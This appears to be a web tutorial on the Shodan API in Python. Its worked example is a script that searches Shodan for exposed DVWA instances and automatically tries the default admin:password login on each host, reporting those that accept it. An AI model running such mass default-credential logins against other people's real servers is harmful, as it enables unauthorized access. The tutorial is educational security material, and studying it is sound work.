Juggling between coding languages? Let our Code Converter help. Your one-stop solution for language conversion. Start now!
Public IP addresses are routed on the Internet, which means a connection can be established between any host having a public IP and any other host connected to the Internet without having a firewall filtering the outgoing traffic, and because IPv4 is still the dominantly used protocol on the Internet, it's possible and nowadays practical to crawl the whole Internet.
There are several platforms that offer Internet scanning as a service, to list a few; Shodan, Censys, and ZoomEye. Using these services, we can scan the Internet for devices running a given service, and we can find surveillance cameras, industrial control systems such as power plants, servers, IoT devices, and much more.
These services often offer an API, which allows programmers to take full advantage of their scan results; they're also used by product managers to check patch applications and to get the big picture on the market shares with competitors, and also used by security researchers to find vulnerable hosts and create reports on vulnerability impacts.
Related: Build 35+ Ethical Hacking Scripts & Tools with Python Book
In this tutorial, we will look into Shodan's API using Python and some of its practical use-cases.
Shodan is by far the most popular IoT search engine. It was created in 2009 and features a web interface for manually exploring data, as well as a REST API and libraries for the most popular programming languages, including Python, Ruby, Java, and C#.
Using most of Shodan features requires a Shodan membership, which costs 49$ at the time of writing the article for a lifetime upgrade, and which is free for students, professors, and IT staff. Refer to this page for more information.
Once you become a member, you can manually explore data. Let's try to find unprotected Axis security cameras:
As you can see, the search engine is quite powerful, especially with search filters. If you want to test more cool queries, we'd recommend checking out this list of awesome Shodan search queries.
Now let's try to use Shodan API. First, we navigate to our account to retrieve our API key:
To get started with Python, we need to install shodan library:
pip3 install shodan
The example we gonna use in this tutorial is we make a script that searches for instances of DVWA (Damn Vulnerable Web Application) that still have default credentials and reports them.
DVWA is an open-source project made for security testing; it's a web application that is vulnerable by design; it's expected that users deploy it on their machines to use it. We will try to find instances on the Internet that already have it deployed to use it without installing it.
There should be a lot of ways to search for DVWA instances, but we gonna stick with the title, as it's straightforward:
The difficulty with doing this task manually is that most of the instances should have their login credentials changed. So, to find accessible DVWA instances, it's necessary to try default credentials on each of the detected instances, we'll do that with Python:
import shodan
import time
import requests
import re
# your shodan API key
SHODAN_API_KEY = '<YOUR_SHODAN_API_KEY_HERE>'
api = shodan.Shodan(SHODAN_API_KEY)
Get: Build 35+ Ethical Hacking Scripts & Tools with Python Book
Now let's write a function that queries a page of results from Shodan. One page can contain up to 100 results, and we add a loop for safety. In case there is a network or API error, we keep retrying with second delays until it works:
# requests a page of data from shodan
def request_page_from_shodan(query, page=1):
while True:
try:
instances = api.search(query, page=page)
return instances
except shodan.APIError as e:
print(f"Error: {e}")
time.sleep(5)
Let's define a function that takes a host and checks if the credentials admin:password
(defaults for DVWA) are valid; this is independent of the Shodan library. We will use the requests
library for submitting our credentials and checking the result:
# Try the default credentials on a given instance of DVWA, simulating a real user trying the credentials
# visits the login.php page to get the CSRF token, and tries to login with admin:password
def has_valid_credentials(instance):
sess = requests.Session()
proto = ('ssl' in instance) and 'https' or 'http'
try:
res = sess.get(f"{proto}://{instance['ip_str']}:{instance['port']}/login.php", verify=False)
except requests.exceptions.ConnectionError:
return False
if res.status_code != 200:
print("[-] Got HTTP status code {res.status_code}, expected 200")
return False
# search the CSRF token using regex
token = re.search(r"user_token' value='([0-9a-f]+)'", res.text).group(1)
res = sess.post(
f"{proto}://{instance['ip_str']}:{instance['port']}/login.php",
f"username=admin&password=password&user_token={token}&Login=Login",
allow_redirects=False,
verify=False,
headers={'Content-Type': 'application/x-www-form-urlencoded'}
)
if res.status_code == 302 and res.headers['Location'] == 'index.php':
# Redirects to index.php, we expect an authentication success
return True
else:
return False
Related: How to Automate Login using Selenium in Python.
The above function sends a GET request to the DVWA login page to retrieve the user_token
. Then, it sends a POST request with the default username, password, and the CSRF token, and then it checks whether the authentication was successful.
Let's write a function that takes a query and iterates over the pages in Shodan search results, and for each host on each page, we call the has_valid_credentials()
function:
# Takes a page of results, and scans each of them, running has_valid_credentials
def process_page(page):
result = []
for instance in page['matches']:
if has_valid_credentials(instance):
print(f"[+] valid credentials at : {instance['ip_str']}:{instance['port']}")
result.append(instance)
return result
# searches on shodan using the given query, and iterates over each page of the results
def query_shodan(query):
print("[*] querying the first page")
first_page = request_page_from_shodan(query)
total = first_page['total']
already_processed = len(first_page['matches'])
result = process_page(first_page)
page = 2
while already_processed < total:
# break just in your testing, API queries have monthly limits
break
print("querying page {page}")
page = request_page_from_shodan(query, page=page)
already_processed += len(page['matches'])
result += process_page(page)
page += 1
return result
# search for DVWA instances
res = query_shodan('title:dvwa')
print(res)
This can be improved significantly by taking advantage of multi-threading to speed up our scanning, as we could check hosts in parallel, check this tutorial that may help you out.
Here is the script output:
As you can see, this Python script works and reports hosts that have the default credentials on DVWA instances.
Read also: How to Extract and Submit Web Forms from a URL using Python.
Scanning for DVWA instances with default credentials might not be the most useful example, as the application is made to be vulnerable by design, and most people using it are not changing their credentials.
However, using Shodan API is very powerful, and the example above highlights how it's possible to iterate over scan results and process each of them with code. The search API is the most popular, but Shodan also supports on-demand scanning, network monitoring, and more. You can check out the API reference for more details.
Disclaimer: We do not encourage you to do illegal activities. With great power comes great responsibility. Using Shodan is not illegal, but brute-forcing credentials on routers and services are, and we are not responsible for any misuse of the API or the Python code we provided.
Check the full code here.
Finally, in our Ethical Hacking with Python Ebook, we've built 35+ hacking tools from scratch using Python. Make sure to check it out here if you're interested!
Learn also: How to Build a SQL Injection Scanner in Python.
Happy Hacking ♥
Save time and energy with our Python Code Generator. Why start from scratch when you can generate? Give it a try!
View Full Code Auto-Generate My Code
Got a coding query or need some guidance before you comment? Check out this Python Code Assistant for expert advice and handy tips. It's like having a coding tutor right in your fingertips!